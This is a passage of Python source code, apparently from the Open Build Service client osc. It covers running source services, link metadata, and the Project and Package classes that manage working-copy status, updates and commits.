os.putenv("OBS_SERVICE_PACKAGE", self.package)
# recreate files
ret = 0
for service in allservices:
if callmode != "all":
if singleservice and service['name'] != singleservice:
continue
if service['mode'] == "buildtime":
continue
if service['mode'] == "serveronly" and callmode != "disabled":
continue
if service['mode'] == "disabled" and callmode != "disabled":
continue
if service['mode'] != "disabled" and callmode == "disabled":
continue
if service['mode'] != "trylocal" and service['mode'] != "localonly" and callmode == "trylocal":
continue
temp_dir = None
try:
temp_dir = tempfile.mkdtemp(dir=dir, suffix='.%s.service' % service['name'])
cmd = service['command']
if not os.path.exists("/usr/lib/obs/service/"+cmd[0]):
raise oscerr.PackageNotInstalled("obs-service-%s"%cmd[0])
cmd[0] = "/usr/lib/obs/service/"+cmd[0]
cmd = cmd + [ "--outdir", temp_dir ]
if conf.config['verbose'] > 1 or verbose or conf.config['debug']:
print("Run source service:", ' '.join(cmd))
r = run_external(*cmd)
if r != 0:
print("Aborting: service call failed: ", ' '.join(cmd))
# FIXME: addDownloadUrlService calls si.execute after
# updating _services.
return r
if service['mode'] == "disabled" or service['mode'] == "trylocal" or service['mode'] == "localonly" or callmode == "local" or callmode == "trylocal" or callmode == "all":
for filename in os.listdir(temp_dir):
os.rename(os.path.join(temp_dir, filename), os.path.join(dir, filename))
else:
name = service['name']
for filename in os.listdir(temp_dir):
os.rename(os.path.join(temp_dir, filename), os.path.join(dir, "_service:"+name+":"+filename))
finally:
if temp_dir is not None:
shutil.rmtree(temp_dir)
return 0
class Linkinfo:
"""linkinfo metadata (which is part of the xml representing a directory
"""
def __init__(self):
"""creates an empty linkinfo instance"""
self.project = None
self.package = None
self.xsrcmd5 = None
self.lsrcmd5 = None
self.srcmd5 = None
self.error = None
self.rev = None
self.baserev = None
def read(self, linkinfo_node):
"""read in the linkinfo metadata from the <linkinfo> element passed as
elementtree node.
If the passed element is None, the method does nothing.
"""
if linkinfo_node == None:
return
self.project = linkinfo_node.get('project')
self.package = linkinfo_node.get('package')
self.xsrcmd5 = linkinfo_node.get('xsrcmd5')
self.lsrcmd5 = linkinfo_node.get('lsrcmd5')
self.srcmd5 = linkinfo_node.get('srcmd5')
self.error = linkinfo_node.get('error')
self.rev = linkinfo_node.get('rev')
self.baserev = linkinfo_node.get('baserev')
def islink(self):
"""returns True if the linkinfo is not empty, otherwise False"""
if self.xsrcmd5 or self.lsrcmd5:
return True
return False
def isexpanded(self):
"""returns True if the package is an expanded link"""
if self.lsrcmd5 and not self.xsrcmd5:
return True
return False
def haserror(self):
"""returns True if the link is in error state (could not be applied)"""
if self.error:
return True
return False
def __str__(self):
"""return an informatory string representation"""
if self.islink() and not self.isexpanded():
return 'project %s, package %s, xsrcmd5 %s, rev %s' \
% (self.project, self.package, self.xsrcmd5, self.rev)
elif self.islink() and self.isexpanded():
if self.haserror():
return 'broken link to project %s, package %s, srcmd5 %s, lsrcmd5 %s: %s' \
% (self.project, self.package, self.srcmd5, self.lsrcmd5, self.error)
else:
return 'expanded link to project %s, package %s, srcmd5 %s, lsrcmd5 %s' \
% (self.project, self.package, self.srcmd5, self.lsrcmd5)
else:
return 'None'
class DirectoryServiceinfo:
def __init__(self):
self.code = None
self.xsrcmd5 = None
self.lsrcmd5 = None
self.error = ''
def read(self, serviceinfo_node):
if serviceinfo_node is None:
return
self.code = serviceinfo_node.get('code')
self.xsrcmd5 = serviceinfo_node.get('xsrcmd5')
self.lsrcmd5 = serviceinfo_node.get('lsrcmd5')
self.error = serviceinfo_node.find('error')
        # explicit None check: an Element without children evaluates to False
        if self.error is not None:
            self.error = self.error.text
def isexpanded(self):
"""
Returns true, if the directory contains the "expanded"/generated service files
"""
return self.lsrcmd5 is not None and self.xsrcmd5 is None
def haserror(self):
return self.error is not None
# http://effbot.org/zone/element-lib.htm#prettyprint
def xmlindent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
for e in elem:
xmlindent(e, level+1)
if not e.tail or not e.tail.strip():
e.tail = i + " "
if not e.tail or not e.tail.strip():
e.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
class Project:
"""
Represent a checked out project directory, holding packages.
:Attributes:
``dir``
The directory path containing the project.
``name``
The name of the project.
``apiurl``
The endpoint URL of the API server.
``pacs_available``
List of names of packages available server-side.
This is only populated if ``getPackageList`` is set
to ``True`` in the constructor.
``pacs_have``
List of names of packages which exist server-side
and exist in the local project working copy (if
'do_package_tracking' is disabled).
If 'do_package_tracking' is enabled it represents the
list names of packages which are tracked in the project
working copy (that is it might contain packages which
exist on the server as well as packages which do not
exist on the server (for instance if the local package
was added or if the package was removed on the server-side)).
``pacs_excluded``
List of names of packages in the local project directory
which are excluded by the `exclude_glob` configuration
variable. Only set if `do_package_tracking` is enabled.
``pacs_unvers``
List of names of packages in the local project directory
which are not tracked. Only set if `do_package_tracking`
is enabled.
``pacs_broken``
List of names of packages which are tracked but do not
exist in the local project working copy. Only set if
`do_package_tracking` is enabled.
``pacs_missing``
List of names of packages which exist server-side but
are not expected to exist in the local project directory.
"""
REQ_STOREFILES = ('_project', '_apiurl')
def __init__(self, dir, getPackageList=True, progress_obj=None, wc_check=True):
"""
Constructor.
:Parameters:
`dir` : str
The directory path containing the checked out project.
`getPackageList` : bool
Set to `False` if you want to skip retrieval from the
server of the list of packages in the project .
`wc_check` : bool
"""
import fnmatch
self.dir = dir
self.absdir = os.path.abspath(dir)
self.progress_obj = progress_obj
self.name = store_read_project(self.dir)
self.apiurl = store_read_apiurl(self.dir, defaulturl=not wc_check)
dirty_files = []
if wc_check:
dirty_files = self.wc_check()
if dirty_files:
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' and check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (self.dir, self.dir, self.dir)
raise oscerr.WorkingCopyInconsistent(self.name, None, dirty_files, msg)
if getPackageList:
self.pacs_available = meta_get_packagelist(self.apiurl, self.name)
else:
self.pacs_available = []
if conf.config['do_package_tracking']:
self.pac_root = self.read_packages().getroot()
self.pacs_have = [ pac.get('name') for pac in self.pac_root.findall('package') ]
self.pacs_excluded = [ i for i in os.listdir(self.dir)
for j in conf.config['exclude_glob']
if fnmatch.fnmatch(i, j) ]
self.pacs_unvers = [ i for i in os.listdir(self.dir) if i not in self.pacs_have and i not in self.pacs_excluded ]
# store all broken packages (e.g. packages which where removed by a non-osc cmd)
# in the self.pacs_broken list
self.pacs_broken = []
for p in self.pacs_have:
if not os.path.isdir(os.path.join(self.absdir, p)):
# all states will be replaced with the '!'-state
# (except it is already marked as deleted ('D'-state))
self.pacs_broken.append(p)
else:
self.pacs_have = [ i for i in os.listdir(self.dir) if i in self.pacs_available ]
self.pacs_missing = [ i for i in self.pacs_available if i not in self.pacs_have ]
def wc_check(self):
global store
dirty_files = []
req_storefiles = Project.REQ_STOREFILES
if conf.config['do_package_tracking']:
req_storefiles += ('_packages',)
for fname in req_storefiles:
if not os.path.exists(os.path.join(self.absdir, store, fname)):
dirty_files.append(fname)
return dirty_files
def wc_repair(self, apiurl=None):
global store
if not os.path.exists(os.path.join(self.dir, store, '_apiurl')) or apiurl:
if apiurl is None:
msg = 'cannot repair wc: the \'_apiurl\' file is missing but ' \
'no \'apiurl\' was passed to wc_repair'
# hmm should we raise oscerr.WrongArgs?
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, [], msg)
# sanity check
conf.parse_apisrv_url(None, apiurl)
store_write_apiurl(self.dir, apiurl)
self.apiurl = store_read_apiurl(self.dir, defaulturl=False)
def checkout_missing_pacs(self, sinfos, expand_link=False, unexpand_link=False):
for pac in self.pacs_missing:
if conf.config['do_package_tracking'] and pac in self.pacs_unvers:
# pac is not under version control but a local file/dir exists
msg = 'can\'t add package \'%s\': Object already exists' % pac
raise oscerr.PackageExists(self.name, pac, msg)
if not (expand_link or unexpand_link):
sinfo = sinfos.get(pac)
if sinfo is None:
# should never happen...
continue
linked = sinfo.find('linked')
if linked is not None and linked.get('project') == self.name:
# hmm what about a linkerror (sinfo.get('lsrcmd5') is None)?
                    # Should we skip the package as well or should we check it out?
# let's skip it for now
print('Skipping %s (link to package %s)' % (pac, linked.get('package')))
continue
print('checking out new package %s' % pac)
checkout_package(self.apiurl, self.name, pac, \
pathname=getTransActPath(os.path.join(self.dir, pac)), \
prj_obj=self, prj_dir=self.dir,
expand_link=expand_link or not unexpand_link, progress_obj=self.progress_obj)
def status(self, pac):
exists = os.path.exists(os.path.join(self.absdir, pac))
st = self.get_state(pac)
if st is None and exists:
return '?'
elif st is None:
raise oscerr.OscIOError(None, 'osc: \'%s\' is not under version control' % pac)
elif st in ('A', ' ') and not exists:
return '!'
elif st == 'D' and not exists:
return 'D'
else:
return st
def get_status(self, *exclude_states):
res = []
for pac in self.pacs_have:
st = self.status(pac)
if not st in exclude_states:
res.append((st, pac))
if not '?' in exclude_states:
res.extend([('?', pac) for pac in self.pacs_unvers])
return res
def get_pacobj(self, pac, *pac_args, **pac_kwargs):
try:
st = self.status(pac)
if st in ('?', '!') or st == 'D' and not os.path.exists(os.path.join(self.dir, pac)):
return None
return Package(os.path.join(self.dir, pac), *pac_args, **pac_kwargs)
except oscerr.OscIOError:
return None
def set_state(self, pac, state):
node = self.get_package_node(pac)
if node == None:
self.new_package_entry(pac, state)
else:
node.set('state', state)
def get_package_node(self, pac):
for node in self.pac_root.findall('package'):
if pac == node.get('name'):
return node
return None
def del_package_node(self, pac):
for node in self.pac_root.findall('package'):
if pac == node.get('name'):
self.pac_root.remove(node)
def get_state(self, pac):
node = self.get_package_node(pac)
if node != None:
return node.get('state')
else:
return None
def new_package_entry(self, name, state):
ET.SubElement(self.pac_root, 'package', name=name, state=state)
def read_packages(self):
"""
Returns an ``xml.etree.cElementTree`` object representing the
parsed contents of the project's ``.osc/_packages`` XML file.
"""
global store
packages_file = os.path.join(self.absdir, store, '_packages')
if os.path.isfile(packages_file) and os.path.getsize(packages_file):
try:
result = ET.parse(packages_file)
except:
msg = 'Cannot read package file \'%s\'. ' % packages_file
msg += 'You can try to remove it and then run osc repairwc.'
raise oscerr.OscIOError(None, msg)
return result
else:
# scan project for existing packages and migrate them
cur_pacs = []
for data in os.listdir(self.dir):
pac_dir = os.path.join(self.absdir, data)
# we cannot use self.pacs_available because we cannot guarantee that the package list
# was fetched from the server
if data in meta_get_packagelist(self.apiurl, self.name) and is_package_dir(pac_dir) \
and Package(pac_dir).name == data:
cur_pacs.append(ET.Element('package', name=data, state=' '))
store_write_initial_packages(self.absdir, self.name, cur_pacs)
return ET.parse(os.path.join(self.absdir, store, '_packages'))
def write_packages(self):
xmlindent(self.pac_root)
store_write_string(self.absdir, '_packages', ET.tostring(self.pac_root, encoding=ET_ENCODING))
def addPackage(self, pac):
import fnmatch
for i in conf.config['exclude_glob']:
if fnmatch.fnmatch(pac, i):
msg = 'invalid package name: \'%s\' (see \'exclude_glob\' config option)' % pac
raise oscerr.OscIOError(None, msg)
state = self.get_state(pac)
if state == None or state == 'D':
self.new_package_entry(pac, 'A')
self.write_packages()
# sometimes the new pac doesn't exist in the list because
# it would take too much time to update all data structs regularly
if pac in self.pacs_unvers:
self.pacs_unvers.remove(pac)
else:
raise oscerr.PackageExists(self.name, pac, 'package \'%s\' is already under version control' % pac)
def delPackage(self, pac, force = False):
state = self.get_state(pac.name)
can_delete = True
if state == ' ' or state == 'D':
del_files = []
for filename in pac.filenamelist + pac.filenamelist_unvers:
filestate = pac.status(filename)
if filestate == 'M' or filestate == 'C' or \
filestate == 'A' or filestate == '?':
can_delete = False
else:
del_files.append(filename)
if can_delete or force:
for filename in del_files:
pac.delete_localfile(filename)
if pac.status(filename) != '?':
# this is not really necessary
pac.put_on_deletelist(filename)
print(statfrmt('D', getTransActPath(os.path.join(pac.dir, filename))))
print(statfrmt('D', getTransActPath(os.path.join(pac.dir, os.pardir, pac.name))))
pac.write_deletelist()
self.set_state(pac.name, 'D')
self.write_packages()
else:
print('package \'%s\' has local modifications (see osc st for details)' % pac.name)
elif state == 'A':
if force:
delete_dir(pac.absdir)
self.del_package_node(pac.name)
self.write_packages()
print(statfrmt('D', pac.name))
else:
print('package \'%s\' has local modifications (see osc st for details)' % pac.name)
elif state == None:
print('package is not under version control')
else:
print('unsupported state')
def update(self, pacs = (), expand_link=False, unexpand_link=False, service_files=False):
if len(pacs):
for pac in pacs:
Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj).update()
else:
# we need to make sure that the _packages file will be written (even if an exception
# occurs)
try:
# update complete project
                # packages which no longer exist upstream
upstream_del = [ pac for pac in self.pacs_have if not pac in self.pacs_available and self.get_state(pac) != 'A']
sinfo_pacs = [pac for pac in self.pacs_have if self.get_state(pac) in (' ', 'D') and not pac in self.pacs_broken]
sinfo_pacs.extend(self.pacs_missing)
sinfos = get_project_sourceinfo(self.apiurl, self.name, True, *sinfo_pacs)
for pac in upstream_del:
if self.status(pac) != '!':
p = Package(os.path.join(self.dir, pac))
self.delPackage(p, force = True)
delete_storedir(p.storedir)
try:
os.rmdir(pac)
except:
pass
self.pac_root.remove(self.get_package_node(pac))
self.pacs_have.remove(pac)
for pac in self.pacs_have:
state = self.get_state(pac)
if pac in self.pacs_broken:
if self.get_state(pac) != 'A':
checkout_package(self.apiurl, self.name, pac,
pathname=getTransActPath(os.path.join(self.dir, pac)), prj_obj=self,
prj_dir=self.dir, expand_link=not unexpand_link, progress_obj=self.progress_obj)
elif state == ' ':
# do a simple update
p = Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj)
rev = None
needs_update = True
if expand_link and p.islink() and not p.isexpanded():
if p.haslinkerror():
try:
rev = show_upstream_xsrcmd5(p.apiurl, p.prjname, p.name, revision=p.rev)
except:
rev = show_upstream_xsrcmd5(p.apiurl, p.prjname, p.name, revision=p.rev, linkrev="base")
p.mark_frozen()
else:
rev = p.linkinfo.xsrcmd5
print('Expanding to rev', rev)
elif unexpand_link and p.islink() and p.isexpanded():
rev = p.linkinfo.lsrcmd5
print('Unexpanding to rev', rev)
elif p.islink() and p.isexpanded():
needs_update = p.update_needed(sinfos[p.name])
if needs_update:
rev = p.latest_rev()
elif p.hasserviceinfo() and p.serviceinfo.isexpanded() and not service_files:
# FIXME: currently, do_update does not propagate the --server-side-source-service-files
# option to this method. Consequence: an expanded service is always unexpanded during
                            # an update (TODO: discuss if this is a reasonable behavior (at least this is the default
# behavior for a while))
needs_update = True
else:
needs_update = p.update_needed(sinfos[p.name])
print('Updating %s' % p.name)
if needs_update:
p.update(rev, service_files)
else:
print('At revision %s.' % p.rev)
if unexpand_link:
p.unmark_frozen()
elif state == 'D':
# pac exists (the non-existent pac case was handled in the first if block)
p = Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj)
if p.update_needed(sinfos[p.name]):
p.update()
elif state == 'A' and pac in self.pacs_available:
# file/dir called pac already exists and is under version control
msg = 'can\'t add package \'%s\': Object already exists' % pac
raise oscerr.PackageExists(self.name, pac, msg)
elif state == 'A':
# do nothing
pass
else:
print('unexpected state.. package \'%s\'' % pac)
self.checkout_missing_pacs(sinfos, expand_link, unexpand_link)
finally:
self.write_packages()
def commit(self, pacs = (), msg = '', files = {}, verbose = False, skip_local_service_run = False, can_branch=False, force=False):
if len(pacs):
try:
for pac in pacs:
todo = []
if pac in files:
todo = files[pac]
state = self.get_state(pac)
if state == 'A':
self.commitNewPackage(pac, msg, todo, verbose=verbose, skip_local_service_run=skip_local_service_run)
elif state == 'D':
self.commitDelPackage(pac)
elif state == ' ':
# display the correct dir when sending the changes
if os_path_samefile(os.path.join(self.dir, pac), os.getcwd()):
p = Package('.')
else:
p = Package(os.path.join(self.dir, pac))
p.todo = todo
p.commit(msg, verbose=verbose, skip_local_service_run=skip_local_service_run, can_branch=can_branch, force=force)
elif pac in self.pacs_unvers and not is_package_dir(os.path.join(self.dir, pac)):
print('osc: \'%s\' is not under version control' % pac)
elif pac in self.pacs_broken:
print('osc: \'%s\' package not found' % pac)
elif state == None:
self.commitExtPackage(pac, msg, todo, verbose=verbose, skip_local_service_run=skip_local_service_run)
finally:
self.write_packages()
else:
# if we have packages marked as '!' we cannot commit
for pac in self.pacs_broken:
if self.get_state(pac) != 'D':
msg = 'commit failed: package \'%s\' is missing' % pac
raise oscerr.PackageMissing(self.name, pac, msg)
try:
for pac in self.pacs_have:
state = self.get_state(pac)
if state == ' ':
# do a simple commit
Package(os.path.join(self.dir, pac)).commit(msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
elif state == 'D':
self.commitDelPackage(pac)
elif state == 'A':
self.commitNewPackage(pac, msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
finally:
self.write_packages()
def commitNewPackage(self, pac, msg = '', files = [], verbose = False, skip_local_service_run = False):
"""creates and commits a new package if it does not exist on the server"""
if pac in self.pacs_available:
print('package \'%s\' already exists' % pac)
else:
user = conf.get_apiurl_usr(self.apiurl)
edit_meta(metatype='pkg',
path_args=(quote_plus(self.name), quote_plus(pac)),
template_args=({
'name': pac,
'user': user}),
apiurl=self.apiurl)
# display the correct dir when sending the changes
olddir = os.getcwd()
if os_path_samefile(os.path.join(self.dir, pac), os.curdir):
os.chdir(os.pardir)
p = Package(pac)
else:
p = Package(os.path.join(self.dir, pac))
p.todo = files
print(statfrmt('Sending', os.path.normpath(p.dir)))
p.commit(msg=msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
self.set_state(pac, ' ')
os.chdir(olddir)
def commitDelPackage(self, pac):
"""deletes a package on the server and in the working copy"""
try:
# display the correct dir when sending the changes
if os_path_samefile(os.path.join(self.dir, pac), os.curdir):
pac_dir = pac
else:
pac_dir = os.path.join(self.dir, pac)
p = Package(os.path.join(self.dir, pac))
#print statfrmt('Deleting', os.path.normpath(os.path.join(p.dir, os.pardir, pac)))
delete_storedir(p.storedir)
try:
os.rmdir(p.dir)
except:
pass
except OSError:
pac_dir = os.path.join(self.dir, pac)
except (oscerr.NoWorkingCopy, oscerr.WorkingCopyOutdated, oscerr.PackageError):
pass
#print statfrmt('Deleting', getTransActPath(os.path.join(self.dir, pac)))
print(statfrmt('Deleting', getTransActPath(pac_dir)))
delete_package(self.apiurl, self.name, pac)
self.del_package_node(pac)
def commitExtPackage(self, pac, msg, files = [], verbose=False, skip_local_service_run=False):
"""commits a package from an external project"""
if os_path_samefile(os.path.join(self.dir, pac), os.getcwd()):
pac_path = '.'
else:
pac_path = os.path.join(self.dir, pac)
project = store_read_project(pac_path)
package = store_read_package(pac_path)
apiurl = store_read_apiurl(pac_path, defaulturl=False)
if not meta_exists(metatype='pkg',
path_args=(quote_plus(project), quote_plus(package)),
template_args=None, create_new=False, apiurl=apiurl):
user = conf.get_apiurl_usr(self.apiurl)
edit_meta(metatype='pkg',
path_args=(quote_plus(project), quote_plus(package)),
template_args=({'name': pac, 'user': user}), apiurl=apiurl)
p = Package(pac_path)
p.todo = files
p.commit(msg=msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
def __str__(self):
r = []
r.append('*****************************************************')
r.append('Project %s (dir=%s, absdir=%s)' % (self.name, self.dir, self.absdir))
r.append('have pacs:\n%s' % ', '.join(self.pacs_have))
r.append('missing pacs:\n%s' % ', '.join(self.pacs_missing))
r.append('*****************************************************')
return '\n'.join(r)
@staticmethod
def init_project(apiurl, dir, project, package_tracking=True, getPackageList=True, progress_obj=None, wc_check=True):
global store
if not os.path.exists(dir):
# use makedirs (checkout_no_colon config option might be enabled)
os.makedirs(dir)
elif not os.path.isdir(dir):
raise oscerr.OscIOError(None, 'error: \'%s\' is no directory' % dir)
if os.path.exists(os.path.join(dir, store)):
raise oscerr.OscIOError(None, 'error: \'%s\' is already an initialized osc working copy' % dir)
else:
os.mkdir(os.path.join(dir, store))
store_write_project(dir, project)
store_write_apiurl(dir, apiurl)
if package_tracking:
store_write_initial_packages(dir, project, [])
return Project(dir, getPackageList, progress_obj, wc_check)
class Package:
"""represent a package (its directory) and read/keep/write its metadata"""
# should _meta be a required file?
REQ_STOREFILES = ('_project', '_package', '_apiurl', '_files', '_osclib_version')
OPT_STOREFILES = ('_to_be_added', '_to_be_deleted', '_in_conflict', '_in_update',
'_in_commit', '_meta', '_meta_mode', '_frozenlink', '_pulled', '_linkrepair',
'_size_limit', '_commit_msg')
def __init__(self, workingdir, progress_obj=None, size_limit=None, wc_check=True):
global store
self.dir = workingdir
self.absdir = os.path.abspath(self.dir)
self.storedir = os.path.join(self.absdir, store)
self.progress_obj = progress_obj
self.size_limit = size_limit
        # a size limit of 0 means "no limit"
        if size_limit == 0:
self.size_limit = None
check_store_version(self.dir)
self.prjname = store_read_project(self.dir)
self.name = store_read_package(self.dir)
self.apiurl = store_read_apiurl(self.dir, defaulturl=not wc_check)
self.update_datastructs()
dirty_files = []
if wc_check:
dirty_files = self.wc_check()
if dirty_files:
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' (Note this might _remove_\n' \
'files from the .osc/ dir). Please check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (self.dir, self.dir, self.dir)
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, dirty_files, msg)
self.todo = []
def wc_check(self):
dirty_files = []
for fname in self.filenamelist:
if not os.path.exists(os.path.join(self.storedir, fname)) and not fname in self.skipped:
dirty_files.append(fname)
for fname in Package.REQ_STOREFILES:
if not os.path.isfile(os.path.join(self.storedir, fname)):
dirty_files.append(fname)
for fname in os.listdir(self.storedir):
if fname in Package.REQ_STOREFILES or fname in Package.OPT_STOREFILES or \
fname.startswith('_build'):
continue
elif fname in self.filenamelist and fname in self.skipped:
dirty_files.append(fname)
elif not fname in self.filenamelist:
dirty_files.append(fname)
for fname in self.to_be_deleted[:]:
if not fname in self.filenamelist:
dirty_files.append(fname)
for fname in self.in_conflict[:]:
if not fname in self.filenamelist:
dirty_files.append(fname)
return dirty_files
def wc_repair(self, apiurl=None):
if not os.path.exists(os.path.join(self.storedir, '_apiurl')) or apiurl:
if apiurl is None:
msg = 'cannot repair wc: the \'_apiurl\' file is missing but ' \
'no \'apiurl\' was passed to wc_repair'
# hmm should we raise oscerr.WrongArgs?
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, [], msg)
# sanity check
conf.parse_apisrv_url(None, apiurl)
store_write_apiurl(self.dir, apiurl)
self.apiurl = store_read_apiurl(self.dir, defaulturl=False)
# all files which are present in the filelist have to exist in the storedir
for f in self.filelist:
# XXX: should we also check the md5?
if not os.path.exists(os.path.join(self.storedir, f.name)) and not f.name in self.skipped:
# if get_source_file fails we're screwed up...
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.storedir, f.name), revision=self.rev,
mtime=f.mtime)
for fname in os.listdir(self.storedir):
if fname in Package.REQ_STOREFILES or fname in Package.OPT_STOREFILES or \
fname.startswith('_build'):
continue
elif not fname in self.filenamelist or fname in self.skipped:
# this file does not belong to the storedir so remove it
os.unlink(os.path.join(self.storedir, fname))
for fname in self.to_be_deleted[:]:
if not fname in self.filenamelist:
self.to_be_deleted.remove(fname)
self.write_deletelist()
for fname in self.in_conflict[:]:
if not fname in self.filenamelist:
self.in_conflict.remove(fname)
self.write_conflictlist()
def info(self):
source_url = makeurl(self.apiurl, ['source', self.prjname, self.name])
r = info_templ % (self.prjname, self.name, self.absdir, self.apiurl, source_url, self.srcmd5, self.rev, self.linkinfo)
return r
def addfile(self, n):
if not os.path.exists(os.path.join(self.absdir, n)):
raise oscerr.OscIOError(None, 'error: file \'%s\' does not exist' % n)
if n in self.to_be_deleted:
self.to_be_deleted.remove(n)
# self.delete_storefile(n)
self.write_deletelist()
elif n in self.filenamelist or n in self.to_be_added:
raise oscerr.PackageFileConflict(self.prjname, self.name, n, 'osc: warning: \'%s\' is already under version control' % n)
# shutil.copyfile(os.path.join(self.dir, n), os.path.join(self.storedir, n))
if self.dir != '.':
pathname = os.path.join(self.dir, n)
else:
pathname = n
self.to_be_added.append(n)
self.write_addlist()
print(statfrmt('A', pathname))
def delete_file(self, n, force=False):
"""deletes a file if possible and marks the file as deleted"""
state = '?'
try:
state = self.status(n)
except IOError as ioe:
if not force:
raise ioe
if state in ['?', 'A', 'M', 'R', 'C'] and not force:
return (False, state)
# special handling for skipped files: if file exists, simply delete it
if state == 'S':
exists = os.path.exists(os.path.join(self.dir, n))
self.delete_localfile(n)
return (exists, 'S')
self.delete_localfile(n)
was_added = n in self.to_be_added
if state in ('A', 'R') or state == '!' and was_added:
self.to_be_added.remove(n)
self.write_addlist()
elif state == 'C':
# don't remove "merge files" (*.r, *.mine...)
# that's why we don't use clear_from_conflictlist
self.in_conflict.remove(n)
self.write_conflictlist()
if not state in ('A', '?') and not (state == '!' and was_added):
self.put_on_deletelist(n)
self.write_deletelist()
return (True, state)
def delete_storefile(self, n):
try: os.unlink(os.path.join(self.storedir, n))
except: pass
def delete_localfile(self, n):
try: os.unlink(os.path.join(self.dir, n))
except: pass
def put_on_deletelist(self, n):
if n not in self.to_be_deleted:
self.to_be_deleted.append(n)
def put_on_conflictlist(self, n):
if n not in self.in_conflict:
self.in_conflict.append(n)
def put_on_addlist(self, n):
if n not in self.to_be_added:
self.to_be_added.append(n)
def clear_from_conflictlist(self, n):
"""delete an entry from the file, and remove the file if it would be empty"""
if n in self.in_conflict:
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
myfilename = os.path.join(self.dir, n + '.mine')
if self.islinkrepair() or self.ispulled():
upfilename = os.path.join(self.dir, n + '.new')
else:
upfilename = os.path.join(self.dir, n + '.r' + self.rev)
try:
os.unlink(myfilename)
# the working copy may be updated, so the .r* ending may be obsolete...
# then we don't care
os.unlink(upfilename)
if self.islinkrepair() or self.ispulled():
os.unlink(os.path.join(self.dir, n + '.old'))
except:
pass
self.in_conflict.remove(n)
self.write_conflictlist()
# XXX: this isn't used at all
def write_meta_mode(self):
# XXX: the "elif" is somehow a contradiction (with current and the old implementation
# it's not possible to "leave" the metamode again) (except if you modify pac.meta
# which is really ugly:) )
if self.meta:
store_write_string(self.absdir, '_meta_mode', '')
elif self.ismetamode():
os.unlink(os.path.join(self.storedir, '_meta_mode'))
def write_sizelimit(self):
if self.size_limit and self.size_limit <= 0:
try:
os.unlink(os.path.join(self.storedir, '_size_limit'))
except:
pass
else:
store_write_string(self.absdir, '_size_limit', str(self.size_limit) + '\n')
def write_addlist(self):
self.__write_storelist('_to_be_added', self.to_be_added)
def write_deletelist(self):
self.__write_storelist('_to_be_deleted', self.to_be_deleted)
def delete_source_file(self, n):
"""delete local a source file"""
self.delete_localfile(n)
self.delete_storefile(n)
def delete_remote_source_file(self, n):
"""delete a remote source file (e.g. from the server)"""
query = 'rev=upload'
u = makeurl(self.apiurl, ['source', self.prjname, self.name, pathname2url(n)], query=query)
http_DELETE(u)
def put_source_file(self, n, tdir, copy_only=False):
query = 'rev=repository'
tfilename = os.path.join(tdir, n)
shutil.copyfile(os.path.join(self.dir, n), tfilename)
# escaping '+' in the URL path (note: not in the URL query string) is
# only a workaround for ruby on rails, which swallows it otherwise
if not copy_only:
u = makeurl(self.apiurl, ['source', self.prjname, self.name, pathname2url(n)], query=query)
http_PUT(u, file = tfilename)
if n in self.to_be_added:
self.to_be_added.remove(n)
def __commit_update_store(self, tdir):
"""move files from transaction directory into the store"""
for filename in os.listdir(tdir):
os.rename(os.path.join(tdir, filename), os.path.join(self.storedir, filename))
def __generate_commitlist(self, todo_send):
root = ET.Element('directory')
for i in sorted(todo_send.keys()):
ET.SubElement(root, 'entry', name=i, md5=todo_send[i])
return root
@staticmethod
def commit_filelist(apiurl, project, package, filelist, msg='', user=None, **query):
"""send the commitlog and the local filelist to the server"""
if user is None:
user = conf.get_apiurl_usr(apiurl)
query.update({'cmd': 'commitfilelist', 'user': user, 'comment': msg})
u = makeurl(apiurl, ['source', project, package], query=query)
f = http_POST(u, data=ET.tostring(filelist, encoding=ET_ENCODING))
root = ET.parse(f).getroot()
return root
@staticmethod
def commit_get_missing(filelist):
"""returns list of missing files (filelist is the result of commit_filelist)"""
error = filelist.get('error')
if error is None:
return []
elif error != 'missing':
raise oscerr.APIError('commit_get_missing_files: '
'unexpected \'error\' attr: \'%s\'' % error)
todo = []
for n in filelist.findall('entry'):
name = n.get('name')
if name is None:
raise oscerr.APIError('missing \'name\' attribute:\n%s\n'
% ET.tostring(filelist, encoding=ET_ENCODING))
todo.append(n.get('name'))
return todo
def __send_commitlog(self, msg, local_filelist):
"""send the commitlog and the local filelist to the server"""
query = {}
if self.islink() and self.isexpanded():
query['keeplink'] = '1'
if conf.config['linkcontrol'] or self.isfrozen():
query['linkrev'] = self.linkinfo.srcmd5
if self.ispulled():
query['repairlink'] = '1'
query['linkrev'] = self.get_pulled_srcmd5()
if self.islinkrepair():
query['repairlink'] = '1'
return self.commit_filelist(self.apiurl, self.prjname, self.name,
local_filelist, msg, **query)
def commit(self, msg='', verbose=False, skip_local_service_run=False, can_branch=False, force=False):
# commit only if the upstream revision is the same as the working copy's
upstream_rev = self.latest_rev()
if self.rev != upstream_rev:
raise oscerr.WorkingCopyOutdated((self.absdir, self.rev, upstream_rev))
if not skip_local_service_run:
r = self.run_source_services(mode="trylocal", verbose=verbose)
            if r != 0:
# FIXME: it is better to raise this in Serviceinfo.execute with more
# information (like which service/command failed)
raise oscerr.ServiceRuntimeError('A service failed with error: %d' % r)
# check if it is a link, if so, branch the package
if self.is_link_to_different_project():
if can_branch:
orgprj = self.get_local_origin_project()
print("Branching {} from {} to {}".format(self.name, orgprj, self.prjname))
exists, targetprj, targetpkg, srcprj, srcpkg = branch_pkg(
self.apiurl, orgprj, self.name, target_project=self.prjname)
                # update _meta and _files to synchronize the local package
# to the new branched one in OBS
self.update_local_pacmeta()
